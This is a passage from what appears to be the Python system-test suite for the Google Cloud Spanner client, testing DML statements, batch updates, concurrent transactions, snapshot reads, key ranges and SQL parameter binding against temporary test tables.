row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
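# batch_update reports a google.rpc Status; translate its numeric code back
# to a grpc.StatusCode so from_grpc_status can raise the matching exception.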
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": Type(code=INT64)},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
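# 'UPDTAE' below is a deliberate syntax error, used to provoke the
# INVALID_ARGUMENT status checked further down.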
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": Type(code=INT64)},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": Type(code=STRING), "target": Type(code=STRING)},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
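# run_in_transaction retries on Aborted, so the concurrent increments
# serialize and the counter ends at INITIAL_VALUE + NUM_THREADS.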
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
PKEY = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, PKEY)
def _query_w_concurrent_update(self, transaction, pkey):
SQL = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
SQL, params={"name": pkey}, param_types={"name": Type(code=STRING)}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
PKEY = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, PKEY)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
ROW_COUNT = 400
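# Exercise each read-only staleness option in turn: read_timestamp,
# min_read_timestamp, max_staleness, exact_staleness, and strong.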
committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
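# A multi_use snapshot pins its read timestamp on first use, so rows deleted
# afterwards must remain visible through it.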
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
ROW_COUNT = 40
committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
ROW_COUNT = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=DDL_STATEMENTS + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(ROW_COUNT, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(ROW_COUNT)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
ROW_COUNT = 40
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
ROW_COUNT = 40
indices = [0, 5, 17]
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
ROW_COUNT = 3000
LIMIT = 100
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=LIMIT))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = all_data_rows[:LIMIT]
self._check_row_data(rows, expected)
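# The KeyRange tests below mirror Python slicing: a closed bound includes its
# endpoint (slice end + 1), an open bound excludes it.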
def test_read_w_ranges(self):
ROW_COUNT = 3000
START = 1000
END = 2000
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(ROW_COUNT))
single_key = KeyRange(start_closed=[START], end_open=[START + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START : START + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[START], end_closed=[END])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START : END + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[START], end_open=[END])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[START], end_open=[END])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START + 1 : END]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[START], end_closed=[END])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START + 1 : END + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
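# In the limit variants above, the limit is applied after the key range is
# resolved, so the expected result is simply the range's rows truncated to
# expected[:limit].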
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
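# generate_read_batches() splits the keyset into partitions that could be
# handed to separate workers; this test processes them sequentially, and the
# batches happen to come back in index order, so plain concatenation matches
# the expected rows.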
def test_execute_sql_w_manual_consume(self):
ROW_COUNT = 3000
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
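# Once fully consumed, the streamed result set's chunk-merging state should
# be drained: no partial row and no pending chunk left over.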
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
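# Append a deterministic ORDER BY (unless the caller opts out or the query
# already orders) so the list comparison against `expected` is stable.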
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=SQL,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=SQL, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
